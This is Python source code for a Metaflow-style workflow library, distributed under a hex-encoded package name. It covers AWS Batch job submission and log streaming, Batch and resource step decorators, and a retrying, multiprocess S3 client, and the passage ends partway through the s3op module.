return response['jobDefinitions'][0]['jobDefinitionArn']
payload = {
'jobDefinitionName': def_name,
'type': 'container',
'containerProperties': {
'image': image,
'jobRoleArn': job_role,
'command': ['echo', 'hello world'],
'memory': 4000,
'vcpus': 1,
},
}
response = self._client.register_job_definition(**payload)
return response['jobDefinitionArn']
def job_name(self, job_name):
self.payload['jobName'] = job_name
return self
def job_queue(self, job_queue):
self.payload['jobQueue'] = job_queue
return self
def image(self, image):
self._image = image
return self
def iam_role(self, iam_role):
self._iam_role = iam_role
return self
def command(self, command):
if 'command' not in self.payload['containerOverrides']:
self.payload['containerOverrides']['command'] = []
self.payload['containerOverrides']['command'].extend(command)
return self
def cpu(self, cpu):
if not (isinstance(cpu, (int, unicode, basestring)) and int(cpu) > 0):
raise BatchJobException(
'Invalid CPU value ({}); it should be greater than 0'.format(cpu))
self.payload['containerOverrides']['vcpus'] = int(cpu)
return self
def memory(self, mem):
if not (isinstance(mem, (int, unicode, basestring)) and int(mem) > 0):
raise BatchJobException(
'Invalid memory value ({}); it should be greater than 0'.format(mem))
self.payload['containerOverrides']['memory'] = int(mem)
return self
def gpu(self, gpu):
if not (isinstance(gpu, (int, unicode, basestring))):
raise BatchJobException(
'invalid gpu value: ({}) (should be 0 or greater)'.format(gpu))
if int(gpu) > 0:
if 'resourceRequirements' not in self.payload['containerOverrides']:
self.payload['containerOverrides']['resourceRequirements'] = []
self.payload['containerOverrides']['resourceRequirements'].append(
{'type': 'GPU', 'value': str(gpu)}
)
return self
def environment_variable(self, name, value):
if 'environment' not in self.payload['containerOverrides']:
self.payload['containerOverrides']['environment'] = []
self.payload['containerOverrides']['environment'].append(
{'name': name, 'value': str(value)}
)
return self
def timeout_in_secs(self, timeout_in_secs):
self.payload['timeout']['attemptDurationSeconds'] = timeout_in_secs
return self
def parameter(self, key, value):
self.payload['parameters'][key] = str(value)
return self
class limit(object):
def __init__(self, delta_in_secs):
self.delta_in_secs = delta_in_secs
self._now = None
def __call__(self, func):
def wrapped(*args, **kwargs):
now = time.time()
if self._now is None or (now - self._now > self.delta_in_secs):
func(*args, **kwargs)
self._now = now
return wrapped
class RunningJob(object):
NUM_RETRIES = 5
def __init__(self, id, client):
self._id = id
self._client = client
self._data = {}
def __repr__(self):
return '{}(\'{}\')'.format(self.__class__.__name__, self._id)
def _apply(self, data):
self._data = data
@limit(1)
def _update(self):
try:
data = self._client.describe_jobs(jobs=[self._id])
except self._client.exceptions.ClientException:
return
self._apply(data['jobs'][0])
def update(self):
self._update()
return self
@property
def id(self):
return self._id
@property
def info(self):
if not self._data:
self.update()
return self._data
@property
def job_name(self):
return self.info['jobName']
@property
def job_queue(self):
return self.info['jobQueue']
@property
def status(self):
if not self.is_done:
self.update()
return self.info['status']
@property
def status_reason(self):
return self.info.get('statusReason')
@property
def created_at(self):
return self.info['createdAt']
@property
def stopped_at(self):
return self.info.get('stoppedAt', 0)
@property
def is_done(self):
if self.stopped_at == 0:
self.update()
return self.stopped_at > 0
@property
def is_running(self):
return self.status == 'RUNNING'
@property
def is_successful(self):
return self.status == 'SUCCEEDED'
@property
def is_crashed(self):
# TODO: Check statusmessage to find if the job crashed instead of failing
return self.status == 'FAILED'
@property
def reason(self):
return self.info['container'].get('reason')
@property
def status_code(self):
if not self.is_done:
self.update()
return self.info['container'].get('exitCode')
def wait_for_running(self):
if not self.is_running and not self.is_done:
BatchWaiter(self._client).wait_for_running(self.id)
@property
def log_stream_name(self):
return self.info['container'].get('logStreamName')
def logs(self):
def get_log_stream(job):
log_stream_name = job.log_stream_name
if log_stream_name:
return BatchLogs('/aws/batch/job', log_stream_name, sleep_on_no_data=1)
else:
return None
log_stream = None
while True:
if self.is_running or self.is_done:
log_stream = get_log_stream(self)
break
elif not self.is_done:
self.wait_for_running()
for i in range(self.NUM_RETRIES):
try:
check_after_done = 0
for line in log_stream:
if not line:
if self.is_done:
if check_after_done > 1:
return
check_after_done += 1
else:
pass
else:
yield line
except Exception as ex:
last_exc = ex
if self.is_crashed:
break
sys.stderr.write(repr(ex))
time.sleep(2 ** i)
def kill(self):
if not self.is_done:
self._client.terminate_job(
jobId=self._id, reason='Metaflow initiated job termination.'
)
return self.update()
class BatchWaiter(object):
def __init__(self, client):
try:
from botocore import waiter
except:
raise BatchJobException(
'Could not import module \'botocore\' which '
'is required for Batch jobs. Install botocore '
'first.'
)
self._client = client
self._waiter = waiter
def wait_for_running(self, job_id):
model = self._waiter.WaiterModel(
{
'version': 2,
'waiters': {
'JobRunning': {
'delay': 1,
'operation': 'DescribeJobs',
'description': 'Wait until job starts running',
'maxAttempts': 1000000,
'acceptors': [
{
'argument': 'jobs[].status',
'expected': 'SUCCEEDED',
'matcher': 'pathAll',
'state': 'success',
},
{
'argument': 'jobs[].status',
'expected': 'FAILED',
'matcher': 'pathAny',
'state': 'success',
},
{
'argument': 'jobs[].status',
'expected': 'RUNNING',
'matcher': 'pathAny',
'state': 'success',
},
],
}
},
}
)
self._waiter.create_waiter_with_client('JobRunning', model, self._client).wait(
jobs=[job_id]
)
class BatchLogs(object):
def __init__(self, group, stream, pos=0, sleep_on_no_data=0):
self._client = get_authenticated_boto3_client('logs')
self._group = group
self._stream = stream
self._pos = pos
self._sleep_on_no_data = sleep_on_no_data
self._buf = deque()
self._token = None
def _get_events(self):
if self._token:
response = self._client.get_log_events(
logGroupName=self._group,
logStreamName=self._stream,
startTime=self._pos,
nextToken=self._token,
startFromHead=True,
)
else:
response = self._client.get_log_events(
logGroupName=self._group,
logStreamName=self._stream,
startTime=self._pos,
startFromHead=True,
)
self._token = response['nextForwardToken']
return response['events']
def __iter__(self):
while True:
self._fill_buf()
if len(self._buf) == 0:
yield ''
if self._sleep_on_no_data > 0:
select.poll().poll(self._sleep_on_no_data * 1000)
else:
while self._buf:
yield self._buf.popleft()
def _fill_buf(self):
events = self._get_events()
for event in events:
self._buf.append(event['message'])
self._pos = event['timestamp'] | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/aws/batch/batch_client.py | batch_client.py |
import os
import sys
import platform
import re
import tarfile
from metaflow.datastore import MetaflowDataStore
from metaflow.datastore.datastore import TransformableObject
from metaflow.datastore.util.s3util import get_s3_client
from metaflow.decorators import StepDecorator
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR
from metaflow.plugins.timeout_decorator import get_run_time_limit_for_task
from metaflow import util
from .batch import Batch, BatchException
from metaflow.metaflow_config import ECS_S3_ACCESS_IAM_ROLE, BATCH_JOB_QUEUE, \
BATCH_CONTAINER_IMAGE, BATCH_CONTAINER_REGISTRY
try:
# python2
from urlparse import urlparse
except: # noqa E722
# python3
from urllib.parse import urlparse
class ResourcesDecorator(StepDecorator):
"""
Step decorator to specify the resources needed when executing this step.
This decorator passes this information along to Batch when requesting resources
to execute this step.
This decorator is ignored if the execution of the step does not happen on Batch.
To use, annotate your step as follows:
```
@resources(cpu=32)
@step
def myStep(self):
...
```
Parameters
----------
cpu : int
Number of CPUs required for this step. Defaults to 1
gpu : int
Number of GPUs required for this step. Defaults to 0
memory : int
Memory size (in MB) required for this step. Defaults to 4000
"""
name = 'resources'
defaults = {
'cpu': '1',
'gpu': '0',
'memory': '4000',
}
class BatchDecorator(StepDecorator):
"""
Step decorator to specify that this step should execute on Batch.
This decorator indicates that your step should execute on Batch. Note that you can
apply this decorator automatically to all steps using the ```--with batch``` argument
when calling run. Step level decorators are overrides and will force a step to execute
on Batch regardless of the ```--with``` specification.
To use, annotate your step as follows:
```
@batch
@step
def myStep(self):
...
```
Parameters
----------
cpu : int
Number of CPUs required for this step. Defaults to 1. If @resources is also
present, the maximum value from all decorators is used
gpu : int
Number of GPUs required for this step. Defaults to 0. If @resources is also
present, the maximum value from all decorators is used
memory : int
Memory size (in MB) required for this step. Defaults to 4000. If @resources is
also present, the maximum value from all decorators is used
image : string
Image to use when launching on Batch. If not specified, a default image mapping to
the current version of Python is used
queue : string
Queue to submit the job to. Defaults to the one determined by the environment variable
METAFLOW_BATCH_JOB_QUEUE
iam_role : string
IAM role that Batch can use to access S3. Defaults to the one determined by the environment
variable METAFLOW_ECS_S3_ACCESS_IAM_ROLE
"""
name = 'batch'
defaults = {
'cpu': '1',
'gpu': '0',
'memory': '4000',
'image': None,
'queue': BATCH_JOB_QUEUE,
'iam_role': ECS_S3_ACCESS_IAM_ROLE
}
package_url = None
package_sha = None
run_time_limit = None
def __init__(self, attributes=None, statically_defined=False):
super(BatchDecorator, self).__init__(attributes, statically_defined)
if not self.attributes['image']:
if BATCH_CONTAINER_IMAGE:
self.attributes['image'] = BATCH_CONTAINER_IMAGE
else:
self.attributes['image'] = 'python:%s.%s' % (platform.python_version_tuple()[0],
platform.python_version_tuple()[1])
if not BatchDecorator._get_registry(self.attributes['image']):
if BATCH_CONTAINER_REGISTRY:
self.attributes['image'] = '%s/%s' % (BATCH_CONTAINER_REGISTRY.rstrip('/'),
self.attributes['image'])
def step_init(self, flow, graph, step, decos, environment, datastore, logger):
if datastore.TYPE != 's3':
raise BatchException('The *@batch* decorator requires --datastore=s3.')
self.logger = logger
self.environment = environment
self.step = step
for deco in decos:
if isinstance(deco, ResourcesDecorator):
for k, v in deco.attributes.items():
# we use the larger of @resources and @batch attributes
my_val = self.attributes.get(k)
if not (my_val is None and v is None):
self.attributes[k] = str(max(int(my_val or 0), int(v or 0)))
self.run_time_limit = get_run_time_limit_for_task(decos)
def runtime_init(self, flow, graph, package, run_id):
self.flow = flow
self.graph = graph
self.package = package
self.run_id = run_id
def runtime_task_created(
self, datastore, task_id, split_index, input_paths, is_cloned):
if not is_cloned:
self._save_package_once(datastore, self.package)
def runtime_step_cli(self, cli_args, retry_count, max_user_code_retries):
if retry_count <= max_user_code_retries:
# after all attempts to run the user code have failed, we don't need
# Batch anymore. We can execute possible fallback code locally.
cli_args.commands = ['batch', 'step']
cli_args.command_args.append(self.package_sha)
cli_args.command_args.append(self.package_url)
cli_args.command_options.update(self.attributes)
cli_args.command_options['run-time-limit'] = self.run_time_limit
cli_args.entrypoint[0] = sys.executable
def task_pre_step(
self, step_name, ds, meta, run_id, task_id, flow, graph, retry_count, max_retries):
if meta.TYPE == 'local':
self.ds_root = ds.root
else:
self.ds_root = None
def task_finished(self, step_name, flow, graph, is_task_ok, retry_count, max_retries):
if self.ds_root:
# We have a local metadata service so we need to persist it to the datastore.
# Note that the datastore is *always* s3 (see runtime_task_created function)
with util.TempDir() as td:
tar_file_path = os.path.join(td, 'metadata.tgz')
with tarfile.open(tar_file_path, 'w:gz') as tar:
# The local metadata is stored in the local datastore
# which, for batch jobs, is always the DATASTORE_LOCAL_DIR
tar.add(DATASTORE_LOCAL_DIR)
# At this point we upload what need to s3
s3, _ = get_s3_client()
with open(tar_file_path, 'rb') as f:
path = os.path.join(
self.ds_root,
MetaflowDataStore.filename_with_attempt_prefix(
'metadata.tgz', retry_count))
url = urlparse(path)
s3.upload_fileobj(f, url.netloc, url.path.lstrip('/'))
@classmethod
def _save_package_once(cls, datastore, package):
if cls.package_url is None:
cls.package_url = datastore.save_data(package.sha, TransformableObject(package.blob))
cls.package_sha = package.sha
@classmethod
def _get_registry(cls, image):
pattern = re.compile('^(?:([^\/]+)\/)?(?:([^\/]+)\/)?([^@:\/]+)(?:[@:](.+))?$')
groups = pattern.match(image).groups()
registry = groups[0]
namespace = groups[1]
if not namespace and registry and not re.match(r'[:.]', registry):
return None
return registry | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/plugins/aws/batch/batch_decorator.py | batch_decorator.py |
import os
import sys
import time
import shutil
import random
import subprocess
from itertools import starmap
from tempfile import mkdtemp, NamedTemporaryFile
from .. import current, FlowSpec
from ..metaflow_config import DATATOOLS_S3ROOT
from ..util import is_stringish,\
to_bytes,\
to_unicode,\
to_fileobj,\
url_quote,\
url_unquote
from ..exception import MetaflowException
from ..debug import debug
from . import s3op
try:
# python2
from urlparse import urlparse
except:
# python3
from urllib.parse import urlparse
from ..metaflow_config import get_authenticated_boto3_client
from botocore.exceptions import ClientError
NUM_S3OP_RETRIES = 8
class MetaflowS3InvalidObject(MetaflowException):
headline = 'Not a string-like object'
class MetaflowS3URLException(MetaflowException):
headline = 'Invalid address'
class MetaflowS3Exception(MetaflowException):
headline = 'S3 access failed'
class MetaflowS3NotFound(MetaflowException):
headline = 'S3 object not found'
class MetaflowS3AccessDenied(MetaflowException):
headline = 'S3 access denied'
class S3Object(object):
"""
This object represents a path or an object in S3,
with an optional local copy.
Get or list calls return one or more of S3Objects.
"""
def __init__(self, prefix, url, path, size=None):
# all fields of S3Object should return a unicode object
def ensure_unicode(x):
return None if x is None else to_unicode(x)
prefix, url, path = map(ensure_unicode, (prefix, url, path))
self._size = size
self._url = url
self._path = path
self._key = None
if path:
self._size = os.stat(self._path).st_size
if prefix is None or prefix == url:
self._key = url
self._prefix = None
else:
self._key = url[len(prefix.rstrip('/')) + 1:].rstrip('/')
self._prefix = prefix
@property
def exists(self):
"""
Does this key correspond to an object in S3?
"""
return self._size is not None
@property
def downloaded(self):
"""
Has this object been downloaded?
"""
return bool(self._path)
@property
def url(self):
"""
S3 location of the object
"""
return self._url
@property
def prefix(self):
"""
Prefix requested that matches the object.
"""
return self._prefix
@property
def key(self):
"""
Key corresponds to the key given to the get call that produced
this object. This may be a full S3 URL or a suffix based on what
was requested.
"""
return self._key
@property
def path(self):
"""
Path to the local file corresponding to the object downloaded.
This file gets deleted automatically when a S3 scope exits.
Returns None if this S3Object has not been downloaded.
"""
return self._path
@property
def blob(self):
"""
Contents of the object as a byte string.
Returns None if this S3Object has not been downloaded.
"""
if self._path:
with open(self._path, 'rb') as f:
return f.read()
@property
def text(self):
"""
Contents of the object as a Unicode string.
Returns None if this S3Object has not been downloaded.
"""
if self._path:
return self.blob.decode('utf-8', errors='replace')
@property
def size(self):
"""
Size of the object in bytes.
Returns None if the key does not correspond to an object in S3.
"""
return self._size
def __str__(self):
if self._path:
return '<S3Object %s (%d bytes, local)>' % (self._url, self._size)
elif self._size:
return '<S3Object %s (%d bytes, in S3)>' % (self._url, self._size)
else:
return '<S3Object %s (object does not exist)>' % self._url
def __repr__(self):
return str(self)
class S3(object):
def __init__(self,
tmproot='.',
bucket=None,
prefix=None,
run=None,
s3root=None):
"""
Initialize a new context for S3 operations. This object is based used as
a context manager for a with statement.
There are two ways to initialize this object depending whether you want
to bind paths to a Metaflow run or not.
1. With a run object:
run: (required) Either a FlowSpec object (typically 'self') or a
Run object corresponding to an existing Metaflow run. These
are used to add a version suffix in the S3 path.
bucket: (optional) S3 bucket.
prefix: (optional) S3 prefix.
2. Without a run object:
s3root: (optional) An S3 root URL for all operations. If this is
not specified, all operations require a full S3 URL.
These options are supported in both the modes:
tmproot: (optional) Root path for temporary files (default: '.')
"""
if run:
# 1. use a (current) run ID with optional customizations
parsed = urlparse(DATATOOLS_S3ROOT)
if not bucket:
bucket = parsed.netloc
if not prefix:
prefix = parsed.path
if isinstance(run, FlowSpec):
if current.is_running_flow:
prefix = os.path.join(prefix,
current.flow_name,
current.run_id)
else:
raise MetaflowS3URLException(\
"Initializing S3 with a FlowSpec outside of a running "
"flow is not supported.")
else:
prefix = os.path.join(prefix, run.parent.id, run.id)
self._s3root = u's3://%s' % os.path.join(bucket, prefix.strip('/'))
elif s3root:
# 2. use an explicit S3 prefix
parsed = urlparse(to_unicode(s3root))
if parsed.scheme != 's3':
raise MetaflowS3URLException(\
"s3root needs to be an S3 URL prefxied with s3://.")
self._s3root = s3root.rstrip('/')
else:
# 3. use the client only with full URLs
self._s3root = None
self._tmpdir = mkdtemp(dir=tmproot, prefix='metaflow.s3.')
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def close(self):
"""
Delete all temporary files downloaded in this context.
"""
try:
if not debug.s3client:
shutil.rmtree(self._tmpdir)
except:
pass
def _url(self, key):
# NOTE: All URLs are handled as Unicode objects (unicde in py2,
# string in py3) internally. We expect that all URLs passed to this
# class as either Unicode or UTF-8 encoded byte strings. All URLs
# returned are Unicode.
if self._s3root is None:
parsed = urlparse(to_unicode(key))
if parsed.scheme == 's3' and parsed.path:
return key
else:
if current.is_running_flow:
raise MetaflowS3URLException(\
"Specify S3(run=self) when you use S3 inside a running "
"flow. Otherwise you have to use S3 with full "
"s3:// urls.")
else:
raise MetaflowS3URLException(\
"Initialize S3 with an 's3root' or 'run' if you don't "
"want to specify full s3:// urls.")
elif key:
if key.startswith('s3://'):
raise MetaflowS3URLException(\
"Don't use absolute S3 URLs when the S3 client is "
"initialized with a prefix. URL: %s" % key)
return os.path.join(self._s3root, key)
else:
return self._s3root
def list_paths(self, keys=None):
"""
List the next level of paths in S3. If multiple keys are
specified, listings are done in parallel. The returned
S3Objects have .exists == False if the url refers to a
prefix, not an existing S3 object.
Args:
keys: (required) a list of suffixes for paths to list.
Returns:
a list of S3Objects (not downloaded)
Example:
Consider the following paths in S3:
A/B/C
D/E
In this case, list_paths(['A', 'D']), returns ['A/B', 'D/E']. The
first S3Object has .exists == False, since it does not refer to an
object in S3. It is just a prefix.
"""
def _list(keys):
if keys is None:
keys = [None]
urls = (self._url(key).rstrip('/') + '/' for key in keys)
res = self._read_many_files('list', urls)
for s3prefix, s3url, size in res:
if size:
yield s3prefix, s3url, None, int(size)
else:
yield s3prefix, s3url, None, None
return list(starmap(S3Object, _list(keys)))
def list_recursive(self, keys=None):
"""
List objects in S3 recursively. If multiple keys are
specified, listings are done in parallel. The returned
S3Objects have always .exists == True, since they refer
to existing objects in S3.
Args:
keys: (required) a list of suffixes for paths to list.
Returns:
a list of S3Objects (not downloaded)
Example:
Consider the following paths in S3:
A/B/C
D/E
In this case, list_recursive(['A', 'D']), returns ['A/B/C', 'D/E'].
"""
def _list(keys):
if keys is None:
keys = [None]
res = self._read_many_files('list',
map(self._url, keys),
recursive=True)
for s3prefix, s3url, size in res:
yield s3prefix, s3url, None, int(size)
return list(starmap(S3Object, _list(keys)))
def get(self, key=None, return_missing=False):
"""
Get a single object from S3.
Args:
key: (optional) a suffix identifying the object.
return_missing: (optional, default False) if set to True, do
not raise an exception for a missing key but
return it as an S3Object with .exists == False.
Returns:
an S3Object corresponding to the object requested.
"""
url = self._url(key)
src = urlparse(url)
def _download(s3, tmp):
s3.download_file(src.netloc, src.path.lstrip('/'), tmp)
return url
try:
path = self._one_boto_op(_download, url)
except MetaflowS3NotFound:
if return_missing:
path = None
else:
raise
return S3Object(self._s3root, url, path)
def get_many(self, keys, return_missing=False):
"""
Get many objects from S3 in parallel.
Args:
keys: (required) a list of suffixes identifying the objects.
return_missing: (optional, default False) if set to True, do
not raise an exception for a missing key but
return it as an S3Object with .exists == False.
Returns:
a list of S3Objects corresponding to the objects requested.
"""
def _get():
res = self._read_many_files('get',
map(self._url, keys),
allow_missing=return_missing,
verify=True,
verbose=False,
listing=True)
for s3prefix, s3url, fname in res:
if fname:
yield self._s3root, s3url, os.path.join(self._tmpdir, fname)
else:
# missing entries per return_missing=True
yield self._s3root, s3prefix, None, None
return list(starmap(S3Object, _get()))
def get_recursive(self, keys):
"""
Get many objects from S3 recursively in parallel.
Args:
keys: (required) a list of suffixes for paths to download
recursively.
Returns:
a list of S3Objects corresponding to the objects requested.
"""
def _get():
res = self._read_many_files('get',
map(self._url, keys),
recursive=True,
verify=True,
verbose=False,
listing=True)
for s3prefix, s3url, fname in res:
yield s3prefix, s3url, os.path.join(self._tmpdir, fname)
return list(starmap(S3Object, _get()))
def get_all(self):
"""
Get all objects from S3 recursively (in parallel). This request
only works if S3 is initialized with a run or a s3root prefix.
Returns:
a list of S3Objects corresponding to the objects requested.
"""
if self._s3root is None:
raise MetaflowS3URLException(\
"Can't get_all() when S3 is initialized without a prefix")
else:
return self.get_recursive([None])
def put(self, key, obj, overwrite=True):
"""
Put an object to S3.
Args:
key: (required) suffix for the object.
obj: (required) a bytes, string, or a unicode object to
be stored in S3.
overwrite: (optional) overwrites the key with obj, if it exists
Returns:
an S3 URL corresponding to the object stored.
"""
if not is_stringish(obj):
raise MetaflowS3InvalidObject(\
"Object corresponding to the key '%s' is not a string "
"or a bytes object." % key)
url = self._url(key)
src = urlparse(url)
def _upload(s3, tmp):
# we need to recreate the StringIO object for retries since
# apparently upload_fileobj will/may close() it
blob = to_fileobj(obj)
s3.upload_fileobj(blob, src.netloc, src.path.lstrip('/'))
if overwrite:
self._one_boto_op(_upload, url)
return url
else:
def _head(s3, tmp):
s3.head_object(Bucket=src.netloc, Key=src.path.lstrip('/'))
try:
self._one_boto_op(_head, url)
except MetaflowS3NotFound as err:
self._one_boto_op(_upload, url)
return url
def put_many(self, key_objs, overwrite=True):
"""
Put objects to S3 in parallel.
Args:
key_objs: (required) an iterator of (key, value) tuples. Value must
be a string, bytes, or a unicode object.
overwrite: (optional) overwrites the key with obj, if it exists
Returns:
a list of (key, S3 URL) tuples corresponding to the files sent.
"""
def _store():
for key, obj in key_objs:
if is_stringish(obj):
with NamedTemporaryFile(dir=self._tmpdir,
delete=False,
mode='wb',
prefix='metaflow.s3.put_many.') as tmp:
tmp.write(to_bytes(obj))
tmp.close()
yield tmp.name, self._url(key), key
else:
raise MetaflowS3InvalidObject(
"Object corresponding to the key '%s' is not a string "
"or a bytes object." % key)
return self._put_many_files(_store(), overwrite)
def put_files(self, key_paths, overwrite=True):
"""
Put files to S3 in parallel.
Args:
key_paths: (required) an iterator of (key, path) tuples.
overwrite: (optional) overwrites the key with obj, if it exists
Returns:
a list of (key, S3 URL) tuples corresponding to the files sent.
"""
def _check():
for key, path in key_paths:
if not os.path.exists(path):
raise MetaflowS3NotFound("Local file not found: %s" % path)
yield path, self._url(key), key
return self._put_many_files(_check(), overwrite)
def _one_boto_op(self, op, url):
error = ''
for i in range(NUM_S3OP_RETRIES):
tmp = NamedTemporaryFile(dir=self._tmpdir,
prefix='metaflow.s3.one_file.',
delete=False)
try:
s3 = get_authenticated_boto3_client('s3')
op(s3, tmp.name)
return tmp.name
except ClientError as err:
error_code = s3op.normalize_client_error(err)
if error_code == 404:
raise MetaflowS3NotFound(url)
elif error_code == 403:
raise MetaflowS3AccessDenied(url)
error = str(err)
except Exception as ex:
# TODO specific error message for out of disk space
error = str(ex)
os.unlink(tmp.name)
# add some jitter to make sure retries are not synchronized
time.sleep(2**i + random.randint(0, 10))
raise MetaflowS3Exception("S3 operation failed.\n"\
"Key requested: %s\n"\
"Error: %s" % (url, error))
# NOTE: re: _read_many_files and _put_many_files
# All file IO is through binary files - we write bytes, we read
# bytes. All inputs and outputs from these functions are Unicode.
# Conversion between bytes and unicode is done through url_quote
# and url_unquote.
def _read_many_files(self, op, prefixes, **options):
with NamedTemporaryFile(dir=self._tmpdir,
mode='wb',
delete=not debug.s3client,
prefix='metaflow.s3.inputs.') as inputfile:
inputfile.write(b'\n'.join(map(url_quote, prefixes)))
inputfile.flush()
stdout, stderr = self._s3op_with_retries(op,
inputs=inputfile.name,
**options)
if stderr:
raise MetaflowS3Exception("Getting S3 files failed.\n"\
"First prefix requested: %s\n"\
"Error: %s" % (prefixes[0], stderr))
else:
for line in stdout.splitlines():
yield tuple(map(url_unquote, line.strip(b'\n').split(b' ')))
def _put_many_files(self, url_files, overwrite):
url_files = list(url_files)
with NamedTemporaryFile(dir=self._tmpdir,
mode='wb',
delete=not debug.s3client,
prefix='metaflow.s3.put_inputs.') as inputfile:
lines = (b' '.join(map(url_quote, (os.path.realpath(local), url)))
for local, url, _ in url_files)
inputfile.write(b'\n'.join(lines))
inputfile.flush()
stdout, stderr = self._s3op_with_retries('put',
filelist=inputfile.name,
verbose=False,
overwrite=overwrite,
listing=True)
if stderr:
raise MetaflowS3Exception("Uploading S3 files failed.\n"\
"First key: %s\n"\
"Error: %s" % (url_files[0][2],
stderr))
else:
urls = set()
for line in stdout.splitlines():
url, _, _ = map(url_unquote, line.strip(b'\n').split(b' '))
urls.add(url)
return [(key, url) for _, url, key in url_files if url in urls]
def _s3op_with_retries(self, mode, **options):
cmdline = [sys.executable, os.path.abspath(s3op.__file__), mode]
for key, value in options.items():
key = key.replace('_', '-')
if isinstance(value, bool):
if value:
cmdline.append('--%s' % key)
else:
cmdline.append('--no-%s' % key)
else:
cmdline.extend(('--%s' % key, value))
for i in range(NUM_S3OP_RETRIES):
with NamedTemporaryFile(dir=self._tmpdir,
mode='wb+',
delete=not debug.s3client,
prefix='metaflow.s3op.stderr') as stderr:
try:
debug.s3client_exec(cmdline)
stdout = subprocess.check_output(cmdline,
cwd=self._tmpdir,
stderr=stderr.file)
return stdout, None
except subprocess.CalledProcessError as ex:
stderr.seek(0)
err_out = stderr.read().decode('utf-8', errors='replace')
stderr.seek(0)
if ex.returncode == s3op.ERROR_URL_NOT_FOUND:
raise MetaflowS3NotFound(err_out)
elif ex.returncode == s3op.ERROR_URL_ACCESS_DENIED:
raise MetaflowS3AccessDenied(err_out)
time.sleep(2**i + random.randint(0, 10))
return None, err_out | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/datatools/s3.py | s3.py |
from __future__ import print_function
import time
import math
import string
import sys
import os
import traceback
from hashlib import sha1
from tempfile import NamedTemporaryFile
from multiprocessing import Process, Queue
from collections import namedtuple
from itertools import starmap, chain, islice
try:
# python2
from urlparse import urlparse
from Queue import Full as QueueFull
except:
# python3
from urllib.parse import urlparse
from queue import Full as QueueFull
import click
# s3op can be launched as a stand-alone script. We must set
# PYTHONPATH for the parent Metaflow explicitly.
sys.path.insert(0,\
os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
# we use Metaflow's parallel_imap_unordered instead of
# multiprocessing.Pool because https://bugs.python.org/issue31886
from metaflow.util import url_quote, url_unquote
from metaflow.multicore_utils import parallel_map
from metaflow.datastore.util.s3util import aws_retry
NUM_WORKERS_DEFAULT = 64
S3Url = namedtuple('S3Url', ['bucket', 'path', 'url', 'local', 'prefix'])
# We use error codes instead of Exceptions, which are trickier to
# handle reliably in a multi-process world
ERROR_INVALID_URL = 4
ERROR_NOT_FULL_PATH = 5
ERROR_URL_NOT_FOUND = 6
ERROR_URL_ACCESS_DENIED = 7
ERROR_WORKER_EXCEPTION = 8
ERROR_VERIFY_FAILED = 9
ERROR_LOCAL_FILE_NOT_FOUND = 10
def format_triplet(prefix, url='', local=''):
return u' '.join(url_quote(x).decode('utf-8') for x in (prefix, url, local))
# I can't understand what's the right way to deal
# with boto errors. This function can be replaced
# with better error handling code.
def normalize_client_error(err):
error_code = err.response['Error']['Code']
try:
return int(error_code)
except ValueError:
if error_code == 'AccessDenied':
return 403
return error_code
# S3 worker pool
def worker(queue, mode):
try:
from metaflow.metaflow_config import get_authenticated_boto3_client
s3 = get_authenticated_boto3_client('s3')
while True:
url = queue.get()
if url is None:
break
if mode == 'download':
tmp = NamedTemporaryFile(dir='.', delete=False)
try:
s3.download_file(url.bucket, url.path, tmp.name)
os.rename(tmp.name, url.local)
except:
# TODO specific error message for out of disk space
os.unlink(tmp.name)
raise
else:
s3.upload_file(url.local, url.bucket, url.path)
except:
traceback.print_exc()
sys.exit(ERROR_WORKER_EXCEPTION)
def start_workers(mode, urls, num_workers):
queue = Queue(len(urls) + num_workers)
procs = {}
# 1. push sources and destinations to the queue
for url, _ in urls:
queue.put(url)
# 2. push end-of-queue markers
for i in range(num_workers):
queue.put(None)
# 3. start processes
for i in range(num_workers):
p = Process(target=worker, args=(queue, mode))
p.start()
procs[p] = True
# 4. wait for the processes to finish
while any(procs.values()):
for proc, is_alive in procs.items():
if is_alive:
proc.join(timeout=1)
if proc.exitcode is not None:
if proc.exitcode == 0:
procs[proc] = False
else:
msg = 'Worker process failed (exit code %d)'\
% proc.exitcode
exit(msg, proc.exitcode)
def process_urls(mode, urls, verbose, num_workers):
if verbose:
print('%sing %d files..' % (mode.capitalize(), len(urls)),
file=sys.stderr)
start = time.time()
start_workers(mode, urls, num_workers)
end = time.time()
if verbose:
total_size = sum(size for url, size in urls)
bw = total_size / (end - start)
print('%sed %d files, %s in total, in %d seconds (%s/s).'\
% (mode.capitalize(),
len(urls),
with_unit(total_size),
end - start,
with_unit(bw)),
file=sys.stderr)
# Utility functions
def with_unit(x):
if x > 1024**3:
return '%.1fGB' % (x / 1024.**3)
elif x > 1024**2:
return '%.1fMB' % (x / 1024.**2)
elif x > 1024:
return '%.1fKB' % (x / 1024.)
else:
return '%d bytes' % x
# S3Ops class is just a wrapper for get_size and list_prefix
# required by @aws_retry decorator, which needs the reset_client
# method. Otherwise they would be just stand-alone functions.
class S3Ops(object):
def __init__(self):
self.s3 = None
def reset_client(self, hard_reset=False):
from metaflow.metaflow_config import get_authenticated_boto3_client
if hard_reset or self.s3 is None:
self.s3 = get_authenticated_boto3_client('s3')
@aws_retry
def get_size(self, url):
self.reset_client()
try:
head = self.s3.head_object(Bucket=url.bucket, Key=url.path)
return True, url, [(url, head['ContentLength'])]
except ClientError as err:
error_code = normalize_client_error(err)
if error_code == 404:
return False, url, ERROR_URL_NOT_FOUND
elif error_code == 403:
return False, url, ERROR_URL_ACCESS_DENIED
else:
raise
@aws_retry
def list_prefix(self, prefix_url, delimiter=''):
self.reset_client()
url_base = 's3://%s/' % prefix_url.bucket
try:
paginator = self.s3.get_paginator('list_objects_v2')
urls = []
for page in paginator.paginate(Bucket=prefix_url.bucket,
Prefix=prefix_url.path,
Delimiter=delimiter):
# note that an url may be both a prefix and an object
# - the trailing slash is significant in S3
if 'Contents' in page:
for key in page.get('Contents', []):
url = url_base + key['Key']
urlobj = S3Url(url=url,
bucket=prefix_url.bucket,
path=key['Key'],
local=generate_local_path(url),
prefix=prefix_url.url)
urls.append((urlobj, key['Size']))
